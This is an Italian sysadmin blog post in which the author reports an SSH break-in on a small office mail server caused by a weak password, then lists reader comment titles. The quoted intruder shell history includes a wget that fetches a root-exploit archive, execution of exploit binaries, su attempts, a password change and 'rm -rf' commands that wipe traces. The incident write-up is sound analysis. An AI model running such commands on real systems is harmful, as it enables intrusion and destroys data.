Storie dalla Sala Macchine |
Home Page | Commenti | Articoli | Faq | Documenti | Ricerca | Archivio | Storie dalla Sala Macchine | Contribuire | Imposta lingua:en it | Login/Register
B - D? Sono B. Senti, qui e' successo un casino dovresti venire a dare un occhiata.
Non devo dire come e' che B ha il mio numero di cellofono eh?
IO - ? Io? Alle sette di mattina? E perche' io?
B - Ti ricordi l'altra volta quando abbiamo
scoperto quei PC di $noivendiamoariafritta nell'armadio? Ecco, ci sono altri
problemi e penso che dovresti dare un occhiata a qualche cosa.
IO - Hemmm... io dovrei andare in ufficio...
B - Chiamo DB e gli dico che vieni qui per fare una cosa importantissima.
IO - Ma seriamente, non potete aspettare nel pom...
B - Nooooo!!!!!
Comunque, dopo un certo tira-e-molla ed una chiamata diretta a DB che da la sua benedizione (e la mia doccia per ritornare in forma quasi umana), mi dirigo verso $noivendiamobigliettisuinternet (che in effetti sta a 5 km da casa mia).
Li' B mi agguanta e mi spiega che succede.
B - Allora, stamani la nostra receptionista e' arrivata molto presto e non
riusciva a leggere la sua posta.
IO - E che c'e' di strano? Si sara' scordata la password.
B - No, non si era scordata la password, perche' non la cambia mai, ma
qualcuno l'aveva cambiata per lei e no non sono stata io a
cambiarla e si io sono l'unica che puo' cambiare le password degli
utenti.
IO - (aspettando il seguito) ...e?
B - Da quando in qua le password si cambiano da sole?
IO - Huemmm... di solito non succede. Vabbe' vediamo sta cosa.
Cosi' andiamo in Sala Macchine, perche' B (ragazza intelligente) ha staccato il cavo di rete del server di posta interno, che fa anche da gateway verso internet per l'ufficio. Attacco una tastiera ed un monitor e guardo. Un 'last' mi dice che gli unici che hanno fatto login sono B dalla console alle 7 di mattina e UL di $noivendiamoariafritta via SSH alle 2 del mattino... Quest'ultimo risulta aver fatto login da un IP di AOL. Qui gatta ci cova.
Un controllino nella homedir di UL la rivela vuota. Vuota. Sento puzza di bruciato. Come minimo dovrebbe esserci un .bash_history se ha fatto login via SSH.
Un controllo nel log di sistema mi dice che "UL" ha sbagliato password 2 volte prima di accedere. Non sembra un brute-force attack.
Sfodero la chiavetta USB ed installo il mio root-kit-test, un controllo non riporta cose strane. Un rapido test mi dice che gli unici files modificati in /etc sono /etc/passwd ed /etc/shadow, ma a questo punto non sono del tutto sicuro di quanto posso fidarmi di questa macchina.
IO - Mi sa che hai fatto bene a chiamarmi e che questa macchina dovra essere
reinstallata, tanto per stare sul sicuro. Sai mica che password aveva UL?
B - Non lo so ma posso scoprirlo.
IO - Ok, tu vai e scopri che io vedo qui che posso scoprire.
Mi viene in mente a quel punto che il backup parte alle 2.30, e magari ha 'salvato' qualche cosa di interessante. Quindi guardo sul disco USB (che viene montato e smontato dalla procedura di backup) e vedo che la directory di UL non e' vuota nel backup di ieri. O gioia. Cosi' riesco a scovare questo interessante frammento di storia:
w
uname -a
ps aux
ls -a
last
ps aux
mailq
ls -a
cat /etc/issue
ps ax
wget makingcash.ucoz.co.uk/Muistul.tgz
tar xzvf Muistul.tgz
cd .local/
./2007
./raptor
ls
ps aux
last root
ps ax
uname -a
cat /etc/passwd
su receptions
su B
su SL
su CL
su ...
cat /etc/passwd
su ...
su ...
su ...
ls -a
cd /tmp
ls -a
rm -rf .* *
cd /var/tmp
ls -a
rm -rf .* *
cd ~
ls -a
cat .bash_history
rm -rf .* *
passwd
ps aux
ls -a
last
clear
cat /etc/issue
exit
"makingcash" eh? Un rapido controllo mi dice che quel file contiene un paio
di local root exploit, che purtroppo per il nostro sedicente cracker, non
funzionano su questo kernel. Il tipo non mi sembra poi tanto scafato, io
avrei cercato di fare login su altre macchine della rete, questo invece sembra
si sia concentrato solo su questa e neanche tanto. Ma il 'su' verso la
receptionista ha funzionato, quindi controllo il .bash_history della
receptionista e vedo che il tipo ha cambiato la password (confermando i
sospetti di B) e poco altro.Gli altri "su" non hanno dato frutti. Un dubbio atroce mi piglia e controllo. No, per fortuna UL non era in sudo. Non che il tipo ci abbia provato comunque.
B ritorna con una faccia schifata.
B - Ci crederesti? La sua password era $nomediUL123.
IO - E adesso e' "seilicenziatoidiota"?
B - Dimmi che non ci e' entrato dentro qualcuno!
IO - Sorry. Ma si', e' entrato dentro qualcuno. Ma non mi sembra che abbia fatto
molto. In ogni caso l'unico accesso che aveva era in questa macchina no? Quindi
anche se aveva una password idiota non ha potuto fare danni altrove. Vedi che
a volte il non avere un sistema di autenticazione centralizzato e' un bene?
A questo punto B ha insistito per offrirmi la colazione nel baretto all'angolo e poi ho speso il resto della giornata reinstallando la macchina e controllando gli altri sistemi dell'ufficio. Dai discorsi che ho udito non credo che $noivendiamoariafritta vendera molto in questo posto.
Davide
12/01/2009 08:30
I commenti sono aggiunti quando e soprattutto se ho il tempo di guardarli e dopo aver eliminato le cagate, spam, tentativi di phishing et similia. Quindi non trattenete il respiro.
Un buon modo per iniziare la giornata Di Gama postato il 12/01/2009 08:18
-- Gama
Data Di Kaspa postato il 12/01/2009 08:19
-- Kaspa
-AT- Kaspa Di Davide Bianchi postato il 12/01/2009 08:31
-- Davide Bianchi
Che dolce risveglio...... Di Eugenio Dorigati postato il 12/01/2009 08:53
-- Eugenio Dorigati
subject Di RaDu postato il 12/01/2009 08:54
-- RaDu
-AT- RaDu Di Davide Bianchi postato il 12/01/2009 09:23
-- Davide Bianchi
Signature Di Gama postato il 12/01/2009 08:55
-- Gama
Non tutto il male viene per nuocere.... Di Cobra78 postato il 12/01/2009 09:17
-- Cobra78
Brutti ricordi Di johnnymnemonic postato il 12/01/2009 09:56
-- johnnymnemonic
E ci risiamo... Di noob postato il 12/01/2009 10:06
-- Matteo Ricci
Exploit Di Daniele Levi postato il 12/01/2009 10:10
-- Daniele Levi
subject Di Daniele G. postato il 12/01/2009 10:22
-- Daniele G.
-AT- Daniele G. Di Davide Bianchi postato il 12/01/2009 12:30
-- Davide Bianchi
dipende... Di mau postato il 12/01/2009 18:54
-- mau
cose varie Di Herr Franz postato il 12/01/2009 11:10
-- Herr Franz
-AT- Herr Franz Di Davide Bianchi postato il 12/01/2009 12:31
-- Davide Bianchi
groan... Di dpantaleo postato il 12/01/2009 11:20
-- dpantaleo
dolce risveglio? Di Tommaso postato il 12/01/2009 11:25
-- Tommaso
Sudo.. Di Dom postato il 12/01/2009 11:48
-- Dom
-AT- Dom Di Davide Bianchi postato il 12/01/2009 12:33
-- Davide Bianchi
Sudo ma Godo ? Di filippo postato il 12/01/2009 14:57
-- filippo
sudo Di Andrea Ballarati postato il 13/01/2009 09:01
-- Andrea Ballarati
+1 x sudo Di Tommaso postato il 13/01/2009 09:38
-- Tommaso
Hum... Di spacexplorer postato il 12/01/2009 12:40
-- spacexplorer
non male Di Daniele postato il 12/01/2009 12:40
-- Daniele
subject Di Gabriele Corrieri postato il 12/01/2009 13:14
-- Gabriele Corrieri
-AT- Gabriele Corrieri Di Andrea Occhi postato il 14/01/2009 17:26
-- Andrea Occhi
root exploit Di checkitout3 postato il 12/01/2009 13:26
-- checkitout3
-AT- checkitout3 Di Davide Bianchi postato il 12/01/2009 14:39
-- Davide Bianchi
root exploit Di checkitout3 postato il 12/01/2009 15:03
-- checkitout3
-AT- checkitout3 Di Davide Bianchi postato il 12/01/2009 15:05
-- Davide Bianchi
... Di Nik postato il 12/01/2009 19:04
-- Nik
Maaaa.... Di Mick Zio Zero postato il 12/01/2009 22:01
-- Mick Zio Zero
Bello Di kache postato il 12/01/2009 23:53
-- kache
-AT- kache Di Davide Bianchi postato il 13/01/2009 08:31
-- Davide Bianchi
... Di Gabriele Corrieri postato il 13/01/2009 00:54
-- Gabriele Corrieri
The bold and the red Di maxxfi postato il 13/01/2009 09:05
-- maxxfi
subject Di Diego postato il 13/01/2009 13:10
-AT- Diego Di Davide Bianchi postato il 13/01/2009 14:25
-- Davide Bianchi
-AT- Diego Di Davide Bianchi postato il 13/01/2009 14:48
-- Davide Bianchi
AAA Di Samuel postato il 13/01/2009 18:06
-- Samuel
-AT- Samuel Di Davide Bianchi postato il 13/01/2009 18:49
-- Davide Bianchi
scafato? Di Thurill-AT-gmail.com postato il 14/01/2009 14:02
-- Thurill-AT-gmail.com
-AT- Thurill-AT-gmail.com Di Lo Zeno postato il 15/01/2009 13:58
-- Lo Zeno
non funzionano su questo kernel Di Davide Inglima postato il 15/01/2009 21:02
-- Davide Inglima
Un buon modo di iniziare la giornata (2) Di kallsu postato il 16/01/2009 21:18
-- kallsu
-AT- kallsu Di Davide Bianchi postato il 17/01/2009 08:39
-- Davide Bianchi
quando il caso ci mette lo zampino ..... Di soichiro postato il 17/01/2009 22:56
-- soichiro
-AT- soichiro Di Davide Bianchi postato il 18/01/2009 09:17
-- Davide Bianchi
file scaricato Di mk postato il 20/03/2009 12:08
-- mk
Il presente sito e' frutto del sudore della mia fronte (e delle mie dita), se siete interessati a ripubblicare uno degli articoli, documenti o qualunque altra cosa presente in questo sito per cortesia datemene comunicazione (o all'autore dell'articolo se non sono io), cosi' il giorno che faccio delle aggiunte potro' avvisarvi e magari mandarvi il testo aggiornato.
Questo sito era composto con VIM, ora e' composto con VIM ed il famosissimo CMS FdT.
Questo sito non e' ottimizzato per la visione con nessun browser particolare, ne' richiede l'uso di font particolari o risoluzioni speciali. Siete liberi di vederlo come vi pare e piace, o come disse qualcuno: "Finalmente uno dei POCHI siti che ancora funzionano con IE5 dentro Windows 3.1".